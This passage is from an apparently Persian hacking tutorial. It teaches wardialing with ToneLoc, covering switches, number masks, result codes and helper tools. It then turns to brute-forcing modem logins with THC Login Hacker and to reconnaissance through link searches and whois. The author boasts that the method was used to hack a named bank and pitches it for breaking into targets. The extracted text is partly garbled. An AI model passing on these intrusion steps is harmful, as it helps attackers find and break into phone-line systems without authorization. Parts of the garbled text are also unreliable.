۴۵٠ﻣﻴﮕﺰارم ایﻦ ﻣﻨﻄﻘﯽ ﺕﺮ اﺱﺖ ﭼﻮن ﺏ ﺎ راﻩ ه ﺎیﯽ ﮐ ﻪ در اداﻣ ﻪ ﻣﻴﮕﻢ ﻣﯽ ﺷﻮد دوﺏﺎرﻩ ﺷﻤﺎرﻩ هﺎی را ﮐﻪ ﻓﻘﻂ ﻣﺜﻼ Timeoutﺷﺪن را دوﺏﺎرﻩ ﺏﺎ زﻣﺎن ﺏﻴﺸﺘﺮی ﺏﺮای اﻧﺘﻈﺎر ﺟﻮاب ﮔﺮﻓﺖ. ﺡﺘﻤﺎ ﮔﺰیﻨﻪ هﺎی Carrier Logging ، Logging to Disk ، Save ، DAT Filesرا ﺏﺎ ﻣﻘﺪار Yﺕﻨﻈﻴﻢ ﮐﻨﻴﺪ. ﺧﻮب ﺡﺎﻻ ﮔﺰیﻨﻪ هﺎی ﭘﻴﮑﺮ ﺏﻨﺪی را ﺏ ﻪ ﺷ ﻤﺎ ﮔﻔ ﺘﻢ و ﺷ ﻤﺎ ﻣﻨﺎﺱ ﺐ ﺡ ﺎل ﺧﻮدﺕ ﻮن ﺁن را ﺕﻨﻈ ﻴﻢ ﮐ ﺮدﻩ ای ﺪ ﺡ ﺎﻻ ﻓﺎی ﻞ ﻣﺮﺏ ﻮط ﺏ ﻪ ﭘﻴﮑ ﺮ ﺏﻨ ﺪی را روی دیﺴﮏ ذﺧﻴﺮﻩ ﮐﻨﻴﺪ اﺱﻢ ﺁن را هﻢ ﺏﺎ ﺕﻮﺟﻪ ﻗﻮاﻋﺪ ﮐﻪ ﮔﻔﺘﻪ ﺷﺪ ﺏﮕﺰاریﺪ ﮐﻪ هﻢ ﺧﻮدﺕﺎن ﺏﻔﻬﻤﻴﺪ!!. ﻧﮑﺘﻪ :ﺏﺮﻧﺎﻣﻪ Tlcfg.exeهﻤﻴﺸﻪ ﻋﻤﻠﻴﺎت ﺧﻮد را ﺏﺮ روی ﻓﺎیﻠﯽ ﺏﺎ ﻧﺎم Tl.cfgاﻧﺠﺎم ﻣﻴﺪهﺪ ﮐﻪ ﺟﻬﺖ اﺱﺘﻔﺎدﻩ از ﺁن ﻻزم اﺱﺖ ﻣﺮﺕﺒﺎ ﻧﺎم اﻧﺘﺨﺎﺏﯽ ﺧﻮد را ﺏﺮای ﻓﺎیﻞ ﭘﻴﮑﺮ ﺏﻨﺪی ﺏﺮﻧﺎﻣﻪ را ﺏﻪ Tl.cfgﺕﻐﻴﻴﺮ دادﻩ و ﭘﺲ از اﻋﻤﺎل ﺕﻐﻴﺮات دوﺏﺎرﻩ ﺁن را ﺏﻪ ﺡﺎﻟﺖ اول ﺏﺮﮔﺮداﻧﻴﺪ!!. ﺡﺎﻻ زﻣﺎن ﺁن رﺱﻴﺪﻩ ﮐﻪ دیﮕﺮ از ﺧﻮد ﺏﺮﻧﺎﻣﻪ اﺱﺘﻔﺎدﻩ ﮐﻨﻴﻢ!! ﮔﺰیﻨﻪ ) ﺱﻮیﭻ ( هﺎی ﺏﺮﻧﺎﻣﻪ را در زیﺮ ﻣﯽ ﺏﻴﻨﺪ : ]ToneLoc [DataFile] /M:[Mask] /R:[Range] /X:[ExMask] /D:[ExRange ]/C:[Config] /#:[Number] /S:[StartTime] /E:[EndTime /H:[Hours] /T /K
و ﺕﻮﺽﻴﺢ هﺎی ﺁن: [DataFile] - File to store data in, may also be a mask [Mask] - To use for phone numbers Format: 555-XXXX [Range] - Range of numbers to dial Format: 5000-6999 [ExMask] - Mask to exclude from scan Format: 1XXX [ExRange] - Range to exclude from scan Format: 2500-2699 [Config] - Configuration file to use [Number] - Number of dials to make Format: 250 [StartTime] - Time to begin scanning Format: 9:30p [EndTime] - Time to end scanning Format: 6:45a [Hours] - Max # of hours to scan Format: 5:30 ]Overrides [EndTime )/T = Tones, /K = Carriers (Override config file, '-' inverts
ﺏﺎ ﻣﺜﺎل ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ ﻣﺘﻮﺟﻪ ﺷﻮیﺪ ﻣﺜﻼ: C :\> toneloc.exe xxxx.dat / c: zzzz.cfg ﺧﻮب هﻤﺎﻧﻄﻮر ﮐﻪ ﻣﻴﺪاﻧﻴﺪ XXXX.datﺕﻤﺎم ﻧﺘﻴﺠﻪ هﺎی ﻣﺎ در ﺁن ﻗﺮار دارد و ZZZZ.cfgهﻤﺎن ﻓﺎیﻞ ﭘﻴﮑﺮ ﺏﻨﺪی ﻣﺎ اﺱﺖ .ﺱ ﻮیﭻ /Cﮐ ﻪ ﻣ ﻦ اﺽﺎﻓﻪ ﮐﺮدم ایﻦ ﮐﺎر را ﻣﻴﮑﻨﺪ ﮐﻪ ﺏﺮای ایﻦ ﺟﺴﺘﺠﻮ ﻓﻘﻂ از ایﻦ ﻓﺎیﻞ اﺱﺘﻔﺎدﻩ ﮐﻨﺪ و دﻓﻌﺎت ﺏﻌﺪ یﮑﯽ دیﮕﻪ را اﺱﺘﻔﺎدﻩ ﮐﻨﻢ . ﺱﻮیﭻ هﺎی /Mو /Rو /Xو /Dهﻤﻪ ﺕﻘﺮیﺒﺎ یﮏ ﮐﺎر را اﻧﺠﺎم ﻣﻴﺪهﻨﺪ ﮐﻪ ﻣﻦ اوﻟﯽ را ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ) دوﺕ ﺎ اوﻟ ﯽ اﺽ ﺎﻓﻪ ﻣﻴﮑﻨ ﺪ دوﺕ ﺎ ﺏﻌ ﺪی ﺡﺬف(. ﻣﻴﺘﻮان ﺏﺎ ایﻦ ﺱﻮیﭻ /Mﻣﺤﺪودﻩ ﺧﺎﺻﯽ از ﺷﻤﺎرﻩ هﺎ را دﻗﻴﻘﺎ ﻣﺸﺨﺺ ﮐﺮد ﻣﺜﻞ: /m: 971-XXXX /m: 971-1XXX /m: 971-X9XX /m: 971-XXX3 … ﮐﻪ ﺏﻪ ﺟﺎی Xهﺎ ﺧﻮد ﺏﺮﻧﺎﻣﻪ ﺕﻤﺎم اﻋﺪاد ﺏﻴﻦ ٠ﺕﺎ ٩را ﺟﺎی ﺁﻧﻬﺎ ﻣﻴﮕﺰارد و ﺷﻤﺎرﻩ ﻣﻴﮕﻴﺮد. ﺏﺎ اﺱﺘﻔﺎدﻩ از ﮔﺰیﻨﻪ هﺎی Xو Dﻣﻴﺘﻮان ﻣﺤﺪودﻩ ای از ﺷﻤﺎرﻩ هﺎ را ﺡﺬف ﮐﺮد از ﺷﻤﺎرﻩ ﮔﻴﺮی ﻣﺜﺎل: C:\>Toneloc.exe xxxx.dat / c: zzzz.cfg /m: 971XXXX /d: 0000-7499 هﻤﺎﻧﻄﻮر ﮐﻪ ﻣﯽ ﺏﻴﻨﻴﺪ ﻣﺤﺪودﻩ ﺏﻴﻦ ٠ﺕﺎ ٧۴٩٩را ﺏﻪ ﺟﺎی Xهﺎ ﻧﻤﯽ ﮔﺰارد S .و eو hهﻢ ﺕﺎﺏﻠﻮ ﮐﻪ ﭼﮑﺎر ﻣﻴﮑﻨﺪ!! ﺕﻮﺟﻪ :ﺏﺎ اﺱﺘﻔﺎدﻩ از ایﻦ ﺕﺮﮐﻴﺒﻬﺎ ﻣﻴﺘﻮان ﮐﺎر را ﺏﻴﻦ ﻣﻮدم هﺎ ﺕﻘﺴﻴﻢ ﮐﺮد . در هﻨﮕﺎم ﮐﺎر ﺏﺮﻧﺎﻣﻪ دﮐﻤﻪ هﺎی ﮐﻴﺒﻮرد ﮐﺎرهﺎی اﻧﺠﺎم ﻣﻴﺪهﻨﺪ ﮐﻪ ﻋﺮض ﻣﻴﮑﻨﻢ . ﺕﻮﺽﻴﺤﺎت ایﻦ ﻓﺮﻣﺎن ﺷﻤﺎرﻩ ﻣﻮرد ﺏﺮﺱﯽ را ﺏﺮای ﺕﺸﺨﻴﺺ ﻧﻮع ﺱﺮویﺲ دهﻨﺪﻩ ﻋﻼﻣﺖ ﻣﻴﮕﺰارد. ایﻦ ﻓﺮﻣﺎن ﺷﻤﺎرﻩ را ،ﺷﻤﺎرﻩ یﮏ ﻣﺎﺷﻴﻦ ﻓﮑﺲ ﻋﻼﻣﺖ ﻣﻴﮕﺰارد. ایﻦ ﻓﺮﻣﺎن ﺷﻤﺎرﻩ را ﺏﻪ ﻋﻨﻮان یﮏ ﻣﺎﺷﻴﻦ GIRLﻋﻼﻣﺖ ﻣﻴﮕﺰارد ) ﻣﺎﺷﻴﻦ GRILﺱﺮویﺲ ﭘﺎﺱﺨﮕﻮیﯽ ﺧﻮد ﮐﺎر از ﻃﺮیﻖ ﺻﺪای ﺽﺒﻂ ﺷﺪﻩ ﻣﯽ ﺏﺎﺷﺪ ﻣﺜﻞ ﺷﻤﺎرﻩ هﺎی هﻮاﺷﻨﺎﺱﯽ ﮐﻪ ﻣﻴﮕﻪ ﻓﻼن ﺷﻤﺎرﻩ را ﺏﺰن ﺕﺎ ﺁب هﻮای ﻓﻼن ﺷﻬﺮ را ﺏﮕﻢ (.
ﻧﺎم ﮐﻠﻴﺪ C F G
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !! ﻣﯽ ﺕﻮان ﺏﺮای ایﻦ ﺷﻤﺎرﻩ ﻧﮑﺘﻪ ای ﻧﻮﺷﺖ. ﻋﻤﻠﻴﺎت ﺷﻤﺎرﻩ ﮔﻴﺮی را ﺏﻪ ﺡﺎل ﺕﻌﻠﻴﻖ در ﻣﯽ ﺁورد و ﺏﺎ ﻓﺸﺎر هﺮ ﮐﻠﻴﺪی اداﻣﻪ ﮐﺎر از ﺱﺮ ﮔﺮﻓﺘﻪ ﻣﯽ ﺷﻮد.. ﻣﻮﺟﺐ ﺧﺮوج ﮐﺎﻣﻞ از ﺏﺮﻧﺎﻣﻪ ﻣﻴﺸﻮد. ﺷﻤﺎرﻩ ﻓﻌﻠﯽ را دوﺏﺎرﻩ ﻣﻴﮕﺮد. ﺏﻠﻨﺪ ﮔﻮهﺎی ﻣﻮدم را ﻓﻌﺎل و یﺎ ﻏﻴﺮ ﻓﻌﺎل ﻣﻴﮑﻨﺪ. ۵ﺙﺎﻧﻴﻪ ﺏﻪ ﻣﺪت اﻧﺘﻈﺎر ﺏﺮای ﭘﺎﺱﺦ را ﻓﻘﻂ ﺏﺮای ایﻦ ﺷﻤﺎرﻩ زیﺎد ﻣﯽ ﮐﻨﺪ. ﺷﻤﺎرﻩ را ﺏﻪ ﻋﻨﻮان ﺱﺮویﺲ Voice Mail Boxیﺎ ) ( VMBﻋﻼﻣﺖ ﻣﻴﮕﺰارد ﺷﻤﺎرﻩ ﻓﻌﻠﯽ را ﮐﻦ ﺱﻞ ﮐﺮدﻩ و ﺷﻤﺎرﻩ ﺏﻌﺪی را ﻣﻴﮕﻴﺮد. ﺏﺎﻋﺚ ﺧﺮوج از ﺏﺮﻧﺎﻣﻪ ﻣﻴﺸﻮد.
ﺻﻔﺤﻪ
١٢
K P Q R S X V ][Spacebar ][Esc
ﺧﻮب ﺕﺎ ﺡﺎﻻ %٨٠از ﮐﺎر را ﺕﻤﺎم ﮐﺮدم ﻣﻌﻤﻮﻻ ﺕﻮی ﺕﻤﺎم ﺁﻣﻮزش هﺎ یﯽ ﮐ ﻪ دی ﺪم ﺕ ﺎ ﺏ ﻪ ﺡ ﺎل ه ﺮ ﮐ ﯽ ﺏ ﻪ ای ﻦ ﻣﺮﺡﻠ ﻪ ﻣﻴﺮﺱ ﻪ دیﮕ ﻪ ﺁﻣ ﻮزش ﺕﻤ ﺎم ﻣﻴﮑﻨﻪ وﻟﯽ اﺻﻞ ﮐﺎر از ﺡﺎﻻ ﺏﻪ ﺏﻌﺪ ﮐﻪ ﺏﻴﺸﺘﺮ هﻢ ﺕﺠﺮﺏﯽ ﻣﻦ ﺏﺎز هﻢ ﺏﻪ ﻋﻠﺖ ....از ایﻦ ﺟﺎ ﺏﻪ ﺏﻌﺪ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ. ﭘﺲ از ﭘﺎیﺎن ﮐﺎر ﺏﺮﻧﺎﻣﻪ ﺏﻪ ﺷﻤﺎ یﮏ ﭘﻴﻐﺎم ﻣﻴﺪهﺪ ﺏﺎ ایﻦ ﻣﺤﺘﻮا ﮐﻪ ،ﮐﺎر ﺕﻤﺎم ﺷﺪ ﻓﺎیﻞ XXXX.Datﺡﺎوی ﻧﺘﻴﺠﻪ ه ﺎ ﻣﻴﺒﺎﺷ ﺪ و ﺏﺎی ﺪ وی ﺮایﺶ ﺷ ﻮد اﻃﻼﻋﺎت ﺁن ﺏﺎزیﺎﺏﯽ و دﺱﺖ ﺧﻮش ﺕﻐﻴﻴﺮ ﺷﻮد .در ایﻦ ﻓﺎیﻞ ﺏﻪ هﺮ ﺷﻤﺎرﻩ ١ﺏﺎیﺖ ﻓﻀﺎ اﺧﺘﺼﺎص ﻣﻴﺪهﺪ و ﺏﻪ ه ﺮ ﺷ ﻤﺎرﻩ ی ﮏ ﻣﻘ ﺪار ﺧ ﻮاص ﻣ ﯽ دهﺪ ﮐﻪ ﻧﺘﻴﺠﻪ ﻋﻤﻞ ﺏﺮﻧﺎﻣﻪ اﺱﺖ ﮐﻪ در ﺟﺪول زیﺮ ﻣﻘﺎدیﺮ و ﻣﻌﻨﯽ ﺁﻧﻬﺎ را ﻣﯽ ﺏﻴﻨﻴﺪ . ﻣﻘﺪار ﮐﺎراﮐﺘﺮی UNDIALED BUSY VOICE NODIAL ABORTED RIAGOUT
ﻣﻘﺪار ﻋﺪدی 00 1X 2X 30 5X 6X
TIMEOUT TONE
7X 8X
CARRIER EXCLUDE
9X 100
ﻣﻔﻬﻮم هﻨﻮز ایﻦ ﺷﻤﺎرﻩ را ﻧﮕﺮﻓﺘﻪ. ﺱﻴﮕﻨﺎل اﺷﻐﺎل ﺏﻮدن ﺧﻂ را دریﺎﻓﺖ ﮐﺮدﻩ. ﺱﻴﮕﻨﺎل ﺻﺪا را ﺕﺸﺨﻴﺺ دادﻩ ).ﻣﻌﻤﻮﻻ ﻣﺎل دﺱﺘﮕﺎﻩ ﻓﮑﺲ اﺱﺖ( اﻣﮑﺎن ﺷﻤﺎرﻩ ﮔﻴﺮی وﺟﺪ ﻧﺪارد. از ﺷﻤﺎرﻩ ﮔﻴﺮی ﺻﺮف ﻧﻈﺮ ﺏﻪ ﻋﻤﻞ ﺁﻣﺪﻩ. ﺏﺮﻧﺎﻣﻪ ﺏﻪ ﻣﻘﺪار Ringoutرﺱﻴﺪﻩ ).ایﻦ ﻣﻘﺪار ﺁﺱﺘﺎﻧﻪ را ﻣﻴﺘﻮان ﺏﺎ اﺱﺘﻔﺎدﻩ از ﺏﺮﻧﺎﻣﻪ ﮐﻤﮑﯽ tlcfg.exeو از ﻣﻨﻮی Scan Optionsﻗﺎﺏﻞ دﺱﺖ رﺱﯽ و ﺕﻌﻴﻴﻦ اﺱﺖ ( ﺏﺮﻧﺎﻣﻪ ﺏﻪ ﻣﻘﺪار TIME OUTرﺱﻴﺪﻩ ) زیﺎد درﺏﺎرﻩ اش ﺕﻮﺽﻴﺢ دادم( در هﻨﮕﺎم اﻧﺠﺎم ﮐﺎر یﮏ ﺱﻴﮕﻨﺎل ﺷﻤﺎرﻩ ﮔﻴﺮی دریﺎﻓﺖ ﮐﺮدﻩ ) ٢ﻋﻠﺖ دارد ﮐﻢ ﺏﻮدن زﻣﺎن ریﺴﺖ یﮏ ﻧﻔﺮ دارد ﺏﺎ ﺕﻠﻔﻦ ﺷﻤﺎرﻩ ﻣﻴﮕﻴﺮد!! ( یﮏ ﺱﻴﮕﻨﺎل CRRIERﺕﺸﺨﻴﺺ دادﻩ !! ﺷﻤﺎرﻩ ﺕﻠﻔﻦ را ﺧﻮدﺕﺎن ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ ﺱﻮیﭻ هﺎ ﺡﺬف ﮐﺮدﻩ ایﺪ .
ﺏﺮﻧﺎﻣﻪ ﮐﻤﮑﯽ tlreplac.exeﮐﻪ هﻤﺮاﻩ ایﻦ ﻧﺮم اﻓﺰار اﺱ ﺖ ﮐ ﺎرایﯽ ﺟﺎﻟ ﺐ دارد ﮐ ﻪ ای ﻦ ه ﻢ ﻣﻴﮕ ﻮیﻢ .ﮐ ﺎر ای ﻦ ﺏﺮﻧﺎﻣ ﻪ ﺏﺮﺱ ﯽ ﻓﺎی ﻞ *.datاﺱ ﺖ و ﺕﻐﻴﻴﺮ یﮏ ﻧﻮع ﺧﻮاص از ﻣﻘﺪار هﺎی ﺏﺎﻻ ﮐﻪ ﮔﻔﺘﻢ هﺮ ﮐﺪام ﭼﻪ ﻣﻌﻨﯽ دارد.ﺧﻮب ﺏﺎﻻ ﺕﺮ هﺎ ﺏﻪ ﺷﻤﺎ ﮔﻔﺘﻢ اﮔﺮ ﻣﺜﻼ زﻣﺎن اﻧﺘﻈ ﺎر ﮐ ﻢ ﺕﻨﻈ ﻴﻢ ﮐ ﺮدﻩ ای ﺪ ﻧﮕﺮان ﻧﺒﺎﺷﻴﺪ ﺷﻤﺎرﻩ هﺎی ﺁن دوﺏﺎرﻩ ﻣﻴﮕﻴﺮیﻢ یﺎ ﻣﺜﻼ ﺷﻤﺎرﻩ هﺎی اﺷﻐﺎل ﺧﻮب ﺏﻪ دﺱﺘﻮر زیﺮ ﺕﻮﺟﻪ ﮐﻨﻴﺪ: C:\>tlreplac.exe XXXX.dat BUSY UNDIALED ﺏﻌﺪ یﮏ ﺱﺮی ﺟﻮاب اﺱﺎس ﺏﻪ ﻗﻮل ﺧﻮدش ﻣﻴﺪهﺪ و ﻣﺎ ﻣﻴﺘﻮاﻧﻴﻢ دوﺏﺎرﻩ ﺷﻤﺎرﻩ هﺎی اﺷﻐﺎل ﺏﮕﻴﺮیﻢ ﺏﻘﻴﻪ ﮐﺎرهﺎ هﻢ ﻣﺜﻞ ﻗﺒﻞ اﺱﺖ. ایﻦ ﻗﻀﻴﻪ ﺏﺮای TIMEOUTو RINGOUTهﻢ ﺻﺪق ﻣﻴﮑﻨﺪ ﮐﻪ ﺏﻪ ﺟﺎی ﻗﺴﻤﺖ زرد ﻣﻴﻨﻮیﺴﻢ !!! یﮏ ﺏﺮﻧﺎﻣﻪ ﮐﻤﮑﯽ دیﮕﻪ هﻢ دارد ﮐﻪ ﮐﺎرش درﺱﺖ ﮐﺮدن ﻓﺎیﻞ *.datﻣﻮرد دﻟﺨﻮاﻩ ﻣﺎ ﺏﺮای ﺷﻤﺎرﻩ هﺎی ﻣﻮرد ﻧﻈﺮ ﮐﻪ اﺱﻢ ﺏﺮﻧﺎﻣﻪ Prescan.exe اﺱﺖ ﮐﺎرش دیﮕﻪ ﺧﻮدﺕﻮن یﺎد ﺏﮕﻴﺮیﺪ .ﺏﻐﻴﺮ از ایﻨﻬﺎ ٣ﺏﺮﻧﺎﻣﻪ ﺁﻣﺎرﮔﻴﺮی ﮐﻤﮑﯽ هﻢ دارد ﮐﻪ ﺧﻮاﻧﺪن و ﺕﺤﻠﻴﻞ را ﺏﺮای ﻣ ﺎ راﺡ ﺖ ﻣ ﯽ ﮐﻨ ﺪ از روی ﻓﺎیﻞ .!! *.dat هﻤﻴﻦ هﻤﺶ ﺕﻮﺽﻴﺢ دادم دیﮕﺮ هﻴﭽﯽ ﻧﻴﺴﺖ ﮐﻪ ﺏﮕﻢ وﻟﯽ از ﮐﻞ و هﺪف ﻣﻘﺎﻟﻪ ای ﮐﻪ ﻣﻴﺨﻮاﺱﺘﻢ ﺏﻨﻮیﺴﻢ ﺧﻴﻠﯽ دور ﺷﺪم وﻟ ﯽ ﺏ ﺮای ﺷ ﻤﺎ ه ﺎ ﺏ ﺪ ﻧ ﺸﺪ ﮐﻪ !!! از ﮐﺎرایﯽ هﺎی ایﻦ روش ﻣﯽ ﺕﻮان ﺏﻪ هﮏ ﺏﺎﻧﮏ ﺕﺠﺎرت ﻧﺎم ﺏﺮد در وﻃﻦ ﺧﻮدﻣﺎن و ...ﻓﮑﺮ ﻧﮑﻨﻴﺪ یﮏ دﻓﻌﻪ ﻣﺴﺨﺮﻩ اﺱﺖ ایﻦ روش ﺏﻠﮑ ﻪ ﺏﺪاﻧﻴﺪ اﮔﺮ ﺟﺎیﯽ را ﺏﻪ ﻃﻮر اﺱﺎﺱﯽ ﺏﺨﻮاهﻴﺪ هﮏ ﮐﻨﻴﺪ ایﻦ روش ﺟﺰو ٣ﮔﺰیﻨﻪ اول اﺱﺖ . اﮔﺮ از ﺧﻂ ﻓﺮﻣﺎن ﻣﺜﻞ ﺧﻴﻠﯽ از ﻣﺎﻣﺎﻧﯽ هﺎ ﻣﻴﺘﺮﺱﻴﺪ ﺏﺪاﻧﻴﺪ یﮏ ﺏﺮﻧﺎﻣﻪ ﮔﺮاﻓﻴﮑﯽ در ﭘﻴ ﺖ ه ﻢ ﺏ ﺮای ای ﻦ ﮐ ﺎر ه ﺴﺖ ﮐ ﻪ ﺧﻴﻠ ﯽ ﺧﻴﻠ ﯽ ﺱﻮﺱ ﻮﻟﯽ وﻟ ﯽ ﺧﺎﻟﯽ از ﻟﻄﻒ ﻧﻴﺴﺖ ﺕﺠﺮﺏﻪ ﮐﺎر ﮐﺮدﻧﺶ ﺏﻪ ﻧﺎم PhoneSweepﮐﻪ از ﺱﺎیﺖ www.sanstorm.comﻣﻴﺘﻮاﻧﻴﺪ ﺏﮕﻴﺮیﺪ اش. ﺧﻮب ﺕﺎ ﺡﺎﻻ دو روش ﺏﻪ ﺷﻤﺎ یﺎد دادم ﺏﺮای ﭘﻴﺪا ﮐﺮدن ﻣﻮدم هﺎی ﻓﻌﺎل و +روش ﻣﺦ ...ﻣﻴﺸﻮد ﺱﻪ ٣روش. ﺡﺎﻻ ﺏﻪ ﻣﻮدم وﺻﻞ ﻣﻴﺸﻮیﻢ اﮔﺮ ﮐﻠﻤﻪ ﻋﺒﻮر و ﻧﺎم ﮐﺎرﺏﺮ و ..ﻧﺨﻮاﺱﺖ ﮐﻪ هﻠﻮ اﮔﺮ ﺧﻮاﺱﺖ ﮐﻪ ﺡﺎﻟﻴﺶ ﻣﻴﮑﻨﻴﻢ ﮐﻪ ای ﻦ ه ﻢ راﻩ دارد و ﺁن ه ﻢ ﺡ ﺪس زدن ﮐﻠﻤﻪ ﻋﺒﻮر!!! و یﺎ ورود ﺏﻪ زور ) ( Brute Forceاﺱﺖ .ﺏﺮای اﻧﺠﺎم ایﻨﮑﺎر روش اول ﮐﻪ هﻤﺎن ﺡﺪس زدن اﺱﺖ ﮐﻪ ﻣﺸﺨﺺ اﺱﺖ ﺏﺎیﺪ ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ ﺷﺮایﻂ هﺪف ﮐﻠﻤﻪ ﺡﺪس زدﻩ ﺷﻮد ﮐﻪ در اﺏﺘﺪای ﻣﻘﺎﻟﻪ دیﺪیﺪ ایﻦ ﮐﻠﻤﻪ هﺎ ﭼﻪ ﺏﻮد . اﮔﺮ ﺡﺪس زدﻩ ﻧﺸﺪ ﻧﮕﺮان ﻧﺒﺎﺷﻴﺪ ﻣﺎ از ﻧﺮم اﻓﺰارهﺎی ﺕﺴﺖ ﮐﻠﻤﻪ ﻋﺒﻮر اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ ﻣﺜﻞ THC Login Hacker :ﮐﻪ ﮐﺎرایﯽ اش ﺧﻮب اﺱﺖ ﻣﻦ ﺁن را اﻧﺪر زﻣﺎن ﻗﺪیﻢ از ﺁدرس HTTP://THC.INFERNO.TUSCULUM.EDU/ :ﮔ ﺮﻓﺘﻢ اﮔ ﺮ ﺏ ﻪ ای ﻦ ﺁدرس ﻧﺘﻮاﻧ ﺴﺘﻴﺪ ﺏﺮوی ﺪ ﻣ ﻦ ﺷﻤﺎ را ﺏﻪ ﮔﻮ ﮔﻞ ﻣﻴﺴﭙﺎرم.
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
١٣
ﮐﺎر ﺏﺎ ایﻦ ﻣﺪل از ﻧﺮم اﻓﺰارهﺎی هﮏ ﻣﺜﻞ هﻤﻴﻦ هﺎ اﺱﺖ.زیﺎد ﻓﺮق ﻧﻤﯽ ﮐﻨﺪ ﭘﺲ ﻧﺘﻴﺠﻪ ﻣﻴﮕﻴﺮیﻢ ﻣﻦ ﻣﺪل دیﮕﺮی را ﺕﻮﺽﻴﺢ ﻧﻤﻴﺪهﻢ ! ی ﮏ ﻧﮑﺘ ﻪ ﺧﻴﻠ ﯽ ﮐ ﺎرﺏﺮدی اﮔ ﺮ ﻣﻮﻗ ﻊ اﺟ ﺮای THC-Scanﭘﻴﻐ ﺎم ﺧﻄ ﺎی Run time 200را ﮔﺮﻓﺘﻴ ﺪ ﻻزم اﺱ ﺖ ﺱ ﻮرس ﺏﺮﻧﺎﻣ ﻪ را ﺏ ﺎ ی ﮏ ﮐﺎﻣﭙﺎیﻠﺮ ﭘﺎﺱﮑﺎل دوﺏﺎرﻩ ﮐﺎﻣﭙﺎیﻞ ﮐﻨﻴﺪ یﺎ ﺕﺤﺖ یﮏ ﺷﺒﻴﻪ ﺱﺎز Dosﻣﺜﻞ doscmdو یﺎ dosemuاﺟﺮا ﮐﻨﻴﺪ. -٣ﺟﺴﺘﺠﻮ در وب ﺑﻪ دﻧﺒﺎل اﻃﻼﻋﺎت ﺵﺒﮑﻪ هﺪف: ایﻦ ﮐﺎر در ﺷﺮایﻂ ﺧﺎﺻﯽ ﻻزم ﮐﻪ اﻧﺠﺎم ﺏﺸﻮد در ﺏﻌﻀﯽ از ﻣﺘﺪهﺎی و یﺎ ﻓﺎرﺱﯽ ﺷﻴﻮﻩ هﺎ هﮏ ﮐﻪ ﺷﻤﺎ ﺏﺎی ﺪ از ی ﮏ ﻟﻴﻨ ﮏ ﺧ ﺎص ﺏ ﻪ ی ﮏ ﺱ ﺎیﺖ ﻣﺘﺼﻞ ﺏﺸﻮیﺪ ﺕﺎ ﺏﻌﻀﯽ از اﺧﺘﻴﺎرات ﺏﻪ ﺷﻤﺎ دادﻩ ﺷﻮد و... ﻣﺜﻼ ﺱﺎیﺖ ﮐﺮوز را ﺏﻪ دﻧﺒﺎل ﻟﻴﻨﮏ هﺎ یﺶ ﺟﺴﺘﺠﻮ ﻣﻴﮑﻨﻴﻢ و ﺏﻪ ایﻦ ﻧﺘﻴﺠﻪ ﻣﻴﺮﺱﻴﻢ ﮐﻪ ﻓﺎیﻠﻬﺎی ﻗﺎﺏﻞ داﻧﻠ ﻮد ﺁن در ﺱ ﺎیﺘﯽ ﺏ ﻪ ﻧ ﺎم ﮐﺮﻣ ﺎن هﮑ ﺮ اﺱ ﺖ .ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ ایﻦ ﻣﺴﺌﻠﻪ ،دیﮕﺮ ﻋﻀﻮ ﺷﺪن و درﺟﻪ ﮔﺮﻓﺘﻦ و ...ﻣﻌﻨﺎیﯽ ﻧﺪارد و ﻣﺎ هﺮ ﭼﯽ ﺏﺨﻮاهﻴﻢ از ﺁن ﺱ ﺎیﺖ ﺏ ﺎ ﺕﻮﺟ ﻪ ﺏ ﻪ روﺷ ﻬﺎیﯽ ﮐ ﻪ ﺏﻌ ﺪا ی ﺎد ﻣﻴﺪم ﺏﺮ ﻣﻴﺪاریﻢ. ﻣﺜﺎل در ﺱﺎیﺖ ALTAVISTAﻣﯽ ﻧﻮیﺴﻴﻢ : Link: www.crouz.com ﺏﻌﺪ ﻧﺘﺎیﺠﯽ را ﮐﻪ ﺷﻤﺎل ﺕﻤﺎﻣﯽ ﺱﺎیﺖ هﺎی وﺏﯽ اﺱﺖ ﮐﻪ ﺏﻪ ایﻦ ﻟﻴﻨﮏ ارﺟﺎع دادﻩ ﺷﺪﻩ را ﻣﯽ ﺏﻴﻨﻴﻢ. ﻓﻌﻼ در ایﻦ ﻣﻮرد ﺏﺲ اﺱﺖ ﻣﻄﻠﺐ زیﺎد اﺱﺖ ﻣﻦ هﻢ ﺡﻮﺻﻠﻪ ﻧﻮﺷﺘﻦ ﻧﺪارم !!! ﺏﺒﺨﺸﻴﺪ. اﻩ اﻩ اﻩ اﻩ اﺻﻼ هﻮا ﺱﻢ ﻧﺒﻮد یﮏ ﻣﻄﻠﺐ ﻣﻬﻢ در ایﻦ ﺏﺎرﻩ اﺱﺖ و ﺁن هﻢ Who isاﺱﺖ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ . اﻟﺒﺘﻪ ﺁﻗﺎی ﺻﻤﺪی در ﻣﻘﺎﻻت ﺧﻮد ﺕﻮﺽﻴﺢ دادن!!!!!!!!! ﮐﻪ ﻣﺎ هﻢ ﺏﺮای ﮐﺎﻣﻞ ﺏﻮدن ﻣﻘﺎﻟﻪ دوﺏﺎرﻩ ﻣﻴﮕﻮیﻢ . ﻣﺎ ایﻦ ﻋﻤﻞ را ﺏﺮای یﺎﻓﺘﻦ اﻃﻼﻋﺎﺕﯽ از ﻗﺒﻴﻞ ﺁدرس هﺎی ، IPﻧﺎﻣﻬﺎی ﺡﻮزﻩ ) ( Domain Nameاﻃﻼﻋﺎﺕﯽ در ﺏ ﺎرﻩ ﻣ ﺴﺌﻮل ﺷ ﺒﮑﻪ ﺁدرس او و ﺷﻤﺎرﻩ ﺕﻠﻔﻦ و ﺱﺎل ﺙﺒﺖ domainو زﻣﺎن اﻧﻘﻀﺎی ﺁن و... ﻣﯽ ﺧﻮاهﻢ اول یﮏ 